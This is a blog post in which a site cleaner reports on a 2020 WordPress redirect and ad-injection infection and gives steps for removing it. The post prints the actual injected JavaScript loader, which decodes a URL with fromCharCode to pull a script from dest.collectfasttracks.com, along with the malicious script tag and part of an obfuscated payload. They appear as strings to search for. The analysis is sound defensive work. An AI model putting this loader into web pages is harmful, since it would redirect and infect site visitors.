+-+-+ +-+ +-+-+-+-+
|G|O| |4| |H|I|V|E|
+-+-+ +-+ +-+-+-+-+

 --- A GOPHER-LIKE INTERFACE FOR HIVE BLOCKCHAIN ---

MALWARE ANALYSIS REPORT - April 2020

BY: @neddykelly | CREATED: April 11, 2020, 10:42 p.m. | VOTES: 83 | PAYOUT: $0.73 | [ VOTE ]

[IMAGE: https://files.peakd.com/file/peakd-hive/neddykelly/LjWPUziv-Cyber20Security20-20Malware20Analysis.png]

[IMAGE: https://files.peakd.com/file/peakd-hive/neddykelly/RiIJeR0E-image.png]

MALWARE ANALYSIS REPORT - April 2020

Updated May 2020: Wordfence blog team revealed in May 2020 about the attacker and compromised sites you can read more here

As WordPress is becoming a popular CMS for most user's these days new hacks are coming onto the scene. Over the weekend I helped a lady with her websites that suffered an attack. Here is what I put together as I couldn't find any documentation about the hack at the time online.

WHAT WAS IT?

REDIRECT SPAM ADVERTISEMENT INJECTION INFECTS LARGE AMOUNTS OF WORDPRESS FILES AND THEMES, PLUGINS AND THE DATABASE
DRIVE-BY SEO REDIRECT AD INJECTION

Job undertaken for a client, the main site was infected and other site's on the shared hosting also became infected.

SCOPE

RESTORED 4 WORDPRESS SITES That became vulnerable from Fastracks and track statistics payload

REMOVED 3 SITES NO LONGER IN USE

#### INFECTION INCLUDED A MALICIOUS REDIRECT PAYLOAD - INFECTING THE FOLLOWING - WP -THEMES, PLUGINS, DATABASE

STEPS FOR REMOVAL

Step 1 - Remove - Search for the following string. and Javascript payload, malicious links

[IMAGE: https://files.peakd.com/file/peakd-hive/neddykelly/x3RvY9Ab-image.png]

[IMAGE: https://files.peakd.com/file/peakd-hive/neddykelly/wFRbCO5F-image.png]

Step 2 - Remove

var jgfjfghkfdrse423 = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,100,101,115,116,46,99,111,108,108,101,99,116,102,97,115,116,116,114,97,99,107,115,46,99,111,109,47,97,46,106,115); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
} -slide - xml-hint.js

Step 3 - Remove

inside database backup .SQL
Script tag containing https://dest.collectfasttracks.com/y.js

**script type='text/javascript' src='https://dest.collectfasttracks.com/y.js'>
Remove following script code and replace with blank
FILES IN QUESTION
SEARCH FOR
Y.JS
VAR
var_0xaae55=["","\x7A\x7F\x74\x7E","\x62\x75\x66\x75\x62\x63\x75","\x63\x60\x7C\x79\x64","\x3E\x..

LINKS FOR WORDPRESS TECHNIQUES AND REFERENCE FOR INVESTIGATIONS

wordpress-malware-redirect-hack-cleanup

wordpress-files-hacked-wp-config-php-hack/

removing-malicious-redirects-site

Sucuri - how to clean hacked WordPress websites

ASKWPGIRL -remove-malware-wordpress-site

Areas to inspect during an infected website

Check Core WordPress Files
Check index.php
Check index.html
Check .htaccess file
Check theme files
Check header.php ( themes folder)
Check footer.php (themes folder)
Check functions.php (themes folder)
Look for adminer script or any other suspicious file names similar.: look for a file named ‘adminer.php’
Locate backdoor
Check for Fake or hidden admin users: Go to the wp_users table of the
Check for both .js and .json files

Server side - Configuration / HTACCESS

However, when under attack these features can be used to harvest clicks for the attacker. Often, the.htaccess file is injected with malicious code to redirect users. Sometimes it’s used to display spam.

[IMAGE: https://files.peakd.com/file/peakd-hive/neddykelly/mDL1nTFF-image.png]

Real-life written removal procedure and removal and analysis in April 2020

Ned
Jose

TAGS: [ #cybersecurity ] [ #diyhub ] [ #diy ] [ #cyber ] [ #hacks ] [ #wordpress ]

Replies

@diyhub | April 11, 2020, 11:15 p.m. | Votes: 0 | [ VOTE ]

Thanks for sharing your creative and inspirational post on HIVE!

This post got curated by our fellow curator @tibfox and you received a 100% upvote from our non-profit curation service!

Join the official DIYHub community on HIVE and show us more of your amazing work!

@googleclone | May 7, 2020, 5:16 p.m. | Votes: 0 | [ VOTE ]

Thanks for including link to our blog https://secure.wphackedhelp.com/blog/ hope you find it useful. Check back for more indepth updated posts

@hivebuzz | May 23, 2020, 5:24 a.m. | Votes: 0 | [ VOTE ]

Congratulations @neddykelly! You have completed the following achievement on the Hive blockchain and have been rewarded with new badge(s) :

You distributed more than 8000 upvotes. Your next target is to reach 9000 upvotes.

You can view your badges on your board And compare to others on the Ranking
If you no longer want to receive notifications, reply to this comment with the word STOP

Support the HiveBuzz project. Vote for our proposal!
@neddykelly | May 26, 2020, 7:47 a.m. | Votes: 0 | [ VOTE ]

Wordfence has written a report on May 13th 2020. The blog article above was written by myself a few weeks before that keeping up with zero-day live threats

@neddykelly | May 26, 2020, 10:50 p.m. | Votes: 0 | [ VOTE ]

the article in reference is shown here via the blog team. https://www.wordfence.com/blog/2020/05/one-attacker-rules-them-all/

[ BACK TO TRENDING ] [ BACK TO MENU ]
CMD>